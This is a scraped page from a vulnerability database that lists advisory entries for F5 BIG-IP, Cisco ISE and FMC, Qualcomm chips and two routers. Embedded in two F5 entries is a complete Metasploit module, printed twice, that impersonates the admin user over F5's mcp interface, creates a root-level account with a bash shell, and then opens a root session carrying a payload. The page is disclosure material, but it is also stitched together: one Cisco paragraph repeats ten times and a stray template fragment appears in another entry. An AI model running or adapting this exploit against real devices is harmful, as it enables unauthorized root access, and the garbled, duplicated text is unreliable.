VARIoT IoT vulnerabilities database

In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary.    Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. BIG-IP Access Policy Manager (APM) , BIG-IP Advanced Firewall Manager (AFM) , BIG-IP Analytics etc. multiple F5 Networks The product contains a command injection vulnerability.Information may be obtained and information may be tampered with. This is a control plane issue; there is no data plane exposure. Appliance mode is enforced by a specific license or may be enabled or disabled for individual Virtual Clustered Multiprocessing (vCMP) guest instances. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'unix_crypt' class MetasploitModule < Msf::Exploit::Local include Msf::Post::Linux::F5Mcp include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'F5 Big-IP Create Admin User', 'Description' => %q{ This creates a local user with a username/password and root-level privileges. Note that a root-level account is not required to do this, which makes it a privilege escalation issue. Note that this is pretty noisy, since it creates a user account and creates log files and such. Additionally, most (if not all) vulnerabilities in F5 grant root access anyways. Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb }, 'License' => MSF_LICENSE, 'Author' => ['Ron Bowes'], 'Platform' => [ 'unix', 'linux', 'python' ], 'SessionTypes' => ['shell', 'meterpreter'], 'References' => [ ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'], ['URL', 'https://support.f5.com/csp/article/K97843387'], ], 'Privileged' => true, 'DisclosureDate' => '2022-11-16', 'Arch' => [ ARCH_CMD, ARCH_PYTHON ], 'Type' => :unix_cmd, 'Targets' => [[ 'Auto', {} ]], 'Notes' => { 'Stability' => [], 'Reliability' => [], 'SideEffects' => [] } ) ) register_options([ OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]), OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]), OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]), ]) end def exploit # Get or generate the username/password fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty? username = datastore['USERNAME'] if datastore['CREATE_SESSION'] password = Rex::Text.rand_text_alphanumeric(12) new_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12) print_status("Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session") else password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12) print_status("Will attempt to create user #{username} / #{password}") end # If the password is already hashed, leave it as-is vprint_status('Hashing the password with SHA512') hashed_password = UnixCrypt::SHA512.build(password) if !hashed_password || hashed_password.empty? fail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt') end # These requests have to go in a single 'session', which, to us, is # a single packet (since we don't have AF_UNIX sockets) result = mcp_send_recv([ # Authenticate as 'admin' (this probably shouldn't work but does) mcp_build('user_authenticated', 'structure', [ mcp_build('user_authenticated_name', 'string', 'admin') ]), # Start transaction mcp_build('start_transaction', 'structure', [ mcp_build('start_transaction_load_type', 'ulong', 0) ]), # Create the role mapping mcp_build('create', 'structure', [ mcp_build('user_role_partition', 'structure', [ mcp_build('user_role_partition_user', 'string', username), mcp_build('user_role_partition_role', 'ulong', 0), mcp_build('user_role_partition_partition', 'string', '[All]'), ]) ]), # Create the userdb entry mcp_build('create', 'structure', [ mcp_build('userdb_entry', 'structure', [ mcp_build('userdb_entry_name', 'string', username), mcp_build('userdb_entry_partition_id', 'string', 'Common'), mcp_build('userdb_entry_is_system', 'ulong', 0), mcp_build('userdb_entry_shell', 'string', '/bin/bash'), mcp_build('userdb_entry_is_crypted', 'ulong', 1), mcp_build('userdb_entry_passwd', 'string', hashed_password), ]) ]), # Finish the transaction mcp_build('end_transaction', 'structure', []) ]) # Handle errors if result.nil? fail_with(Failure::Unknown, 'Request to mcp appeared to fail') end # The only result we really care about is an error error_returned = false result.each do |r| result = mcp_get_single(r, 'result') result_code = mcp_get_single(result, 'result_code') # If there's no code or it's zero, just ignore it if result_code.nil? || result_code == 0 next end # If we're here, an error was returned! error_returned = true # Otherwise, try and get result_message result_message = mcp_get_single(result, 'result_message') if result_message.nil? print_warning("mcp query returned a non-zero result (#{result_code}), but no error message") else print_error("mcp query returned an error message: #{result_message} (code: #{result_code})") end end # Let them know if it likely worked if !error_returned print_good("Service didn't return an error, so user was likely created!") if datastore['CREATE_SESSION'] print_status('Attempting create a root session...') out = cmd_exec("echo -ne \"#{password}\\n#{password}\\n#{new_password}\\n#{new_password}\\n#{payload.encoded}\\n\" | su #{username}") vprint_status("Output from su command: #{out}") end end end end

A vulnerability in the web-based management interface of Cisco Identity Services Engine could allow an authenticated, remote attacker to inject arbitrary commands on the underlying operating system. This vulnerability is due to improper validation of user input within requests as part of the web-based management interface. An attacker could exploit this vulnerability by manipulating requests to the web-based management interface to contain operating system commands. A successful exploit could allow the attacker to execute arbitrary operating system commands on the underlying operating system with the privileges of the web services user. Cisco has not yet released software updates that address this vulnerability. (DoS) It may be in a state. For more information about these vulnerabilities, see the Details section of this advisory. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-7Q4TNYUx

A vulnerability in the web-based management interface of Cisco Identity Services Engine could allow an authenticated, remote attacker to take privileges actions within the web-based management interface. This vulnerability is due to improper access control on a feature within the web-based management interface of the affected system. An attacker could exploit this vulnerability by accessing features through direct requests, bypassing checks within the application. A successful exploit could allow the attacker to take privileged actions within the web-based management interface that should be otherwise restricted. {{value}} ["%7b%7bvalue%7d%7d"])}]] . Cisco Identity Services Engine Exists in unspecified vulnerabilities.Information may be obtained and information may be tampered with. For more information about these vulnerabilities, see the Details section of this advisory. Cisco plans to release software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-7Q4TNYUx

In all versions,  BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP.    Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. BIG-IQ Centralized Management , BIG-IP Advanced Firewall Manager (AFM) , BIG-IP Analytics etc. multiple F5 Networks The product contains a cross-site request forgery vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. An attacker may trick users who have at least resource administrator role privilege and are authenticated through basic authentication in iControl SOAP into performing critical actions. An attacker can exploit this vulnerability only through the control plane, not through the data plane. If exploited, the vulnerability can compromise the complete system. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'unix_crypt' class MetasploitModule < Msf::Exploit::Local include Msf::Post::Linux::F5Mcp include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'F5 Big-IP Create Admin User', 'Description' => %q{ This creates a local user with a username/password and root-level privileges. Note that a root-level account is not required to do this, which makes it a privilege escalation issue. Note that this is pretty noisy, since it creates a user account and creates log files and such. Additionally, most (if not all) vulnerabilities in F5 grant root access anyways. Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb }, 'License' => MSF_LICENSE, 'Author' => ['Ron Bowes'], 'Platform' => [ 'unix', 'linux', 'python' ], 'SessionTypes' => ['shell', 'meterpreter'], 'References' => [ ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'], ['URL', 'https://support.f5.com/csp/article/K97843387'], ], 'Privileged' => true, 'DisclosureDate' => '2022-11-16', 'Arch' => [ ARCH_CMD, ARCH_PYTHON ], 'Type' => :unix_cmd, 'Targets' => [[ 'Auto', {} ]], 'Notes' => { 'Stability' => [], 'Reliability' => [], 'SideEffects' => [] } ) ) register_options([ OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]), OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]), OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]), ]) end def exploit # Get or generate the username/password fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty? username = datastore['USERNAME'] if datastore['CREATE_SESSION'] password = Rex::Text.rand_text_alphanumeric(12) new_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12) print_status("Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session") else password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12) print_status("Will attempt to create user #{username} / #{password}") end # If the password is already hashed, leave it as-is vprint_status('Hashing the password with SHA512') hashed_password = UnixCrypt::SHA512.build(password) if !hashed_password || hashed_password.empty? fail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt') end # These requests have to go in a single 'session', which, to us, is # a single packet (since we don't have AF_UNIX sockets) result = mcp_send_recv([ # Authenticate as 'admin' (this probably shouldn't work but does) mcp_build('user_authenticated', 'structure', [ mcp_build('user_authenticated_name', 'string', 'admin') ]), # Start transaction mcp_build('start_transaction', 'structure', [ mcp_build('start_transaction_load_type', 'ulong', 0) ]), # Create the role mapping mcp_build('create', 'structure', [ mcp_build('user_role_partition', 'structure', [ mcp_build('user_role_partition_user', 'string', username), mcp_build('user_role_partition_role', 'ulong', 0), mcp_build('user_role_partition_partition', 'string', '[All]'), ]) ]), # Create the userdb entry mcp_build('create', 'structure', [ mcp_build('userdb_entry', 'structure', [ mcp_build('userdb_entry_name', 'string', username), mcp_build('userdb_entry_partition_id', 'string', 'Common'), mcp_build('userdb_entry_is_system', 'ulong', 0), mcp_build('userdb_entry_shell', 'string', '/bin/bash'), mcp_build('userdb_entry_is_crypted', 'ulong', 1), mcp_build('userdb_entry_passwd', 'string', hashed_password), ]) ]), # Finish the transaction mcp_build('end_transaction', 'structure', []) ]) # Handle errors if result.nil? fail_with(Failure::Unknown, 'Request to mcp appeared to fail') end # The only result we really care about is an error error_returned = false result.each do |r| result = mcp_get_single(r, 'result') result_code = mcp_get_single(result, 'result_code') # If there's no code or it's zero, just ignore it if result_code.nil? || result_code == 0 next end # If we're here, an error was returned! error_returned = true # Otherwise, try and get result_message result_message = mcp_get_single(result, 'result_message') if result_message.nil? print_warning("mcp query returned a non-zero result (#{result_code}), but no error message") else print_error("mcp query returned an error message: #{result_message} (code: #{result_code})") end end # Let them know if it likely worked if !error_returned print_good("Service didn't return an error, so user was likely created!") if datastore['CREATE_SESSION'] print_status('Attempting create a root session...') out = cmd_exec("echo -ne \"#{password}\\n#{password}\\n#{new_password}\\n#{new_password}\\n#{payload.encoded}\\n\" | su #{username}") vprint_status("Output from su command: #{out}") end end end end

A vulnerability in the web-based management interface of Cisco Identity Services Engine could allow an authenticated, remote attacker to conduct cross-site scripting attacks against other users of the application web-based management interface. This vulnerability is due to improper validation of input to an application feature before storage within the web-based management interface. An attacker could exploit this vulnerability by creating entries within the application interface that contain malicious HTML or script code. A successful exploit could allow the attacker to store malicious HTML or script code within the application interface for use in further cross-site scripting attacks. Cisco has not yet released software updates that address this vulnerability. For more information about these vulnerabilities, see the Details section of this advisory. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-7Q4TNYUx

Denial of service due to null pointer dereference when GATT is disconnected in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music. APQ8009 firmware, APQ8017 firmware, APQ8096AU For multiple Qualcomm products such as firmware, NULL There is a vulnerability in pointer dereference.Service operation interruption (DoS) It may be in a state. Qualcomm chip is a chip of Qualcomm (Qualcomm). A way of miniaturizing circuits (primarily semiconductor devices, but also passive components, etc.) and often fabricated on the surface of a semiconductor wafer. There are security vulnerabilities in several products of Qualcomm chips. The vulnerability is caused by a null pointer reference when its GATT is disconnected, resulting in a denial of service

Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected device. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface, or access sensitive, browser-based information. In some cases, it is also possible to cause a temporary availability impact to portions of the FMC Dashboard

Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected device. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface, or access sensitive, browser-based information. In some cases, it is also possible to cause a temporary availability impact to portions of the FMC Dashboard

Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected device. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface, or access sensitive, browser-based information. In some cases, it is also possible to cause a temporary availability impact to portions of the FMC Dashboard

Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected device. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface, or access sensitive, browser-based information. In some cases, it is also possible to cause a temporary availability impact to portions of the FMC Dashboard

Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected device. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface, or access sensitive, browser-based information. In some cases, it is also possible to cause a temporary availability impact to portions of the FMC Dashboard

Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected device. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface, or access sensitive, browser-based information. In some cases, it is also possible to cause a temporary availability impact to portions of the FMC Dashboard

Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected device. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface, or access sensitive, browser-based information. In some cases, it is also possible to cause a temporary availability impact to portions of the FMC Dashboard

Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected device. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface, or access sensitive, browser-based information. In some cases, it is also possible to cause a temporary availability impact to portions of the FMC Dashboard

Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected device. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface, or access sensitive, browser-based information. In some cases, it is also possible to cause a temporary availability impact to portions of the FMC Dashboard

Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected device. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface, or access sensitive, browser-based information. In some cases, it is also possible to cause a temporary availability impact to portions of the FMC Dashboard

Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected device. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface, or access sensitive, browser-based information. In some cases, it is also possible to cause a temporary availability impact to portions of the FMC Dashboard

Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface of an affected device. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface, or access sensitive, browser-based information. In some cases, it is also possible to cause a temporary availability impact to portions of the FMC Dashboard

TY-6201A is a cost-effective full-band wireless router that supports Wi-Fi6. Sichuan Tianyi Kanghe Communications Co., Ltd. TY-6201A has a logic flaw vulnerability. Attackers can use this vulnerability to request a specific path through POST to modify the password without permission.

Tenda AC1200 Router Model W15Ev2 V15.11.0.10(1576) was discovered to contain a stack overflow via the setRemoteWebManage function. This vulnerability allows attackers to cause a Denial of Service (DoS) via crafted overflow data. Tenda AC1200 is a wireless router made by China Tenda Company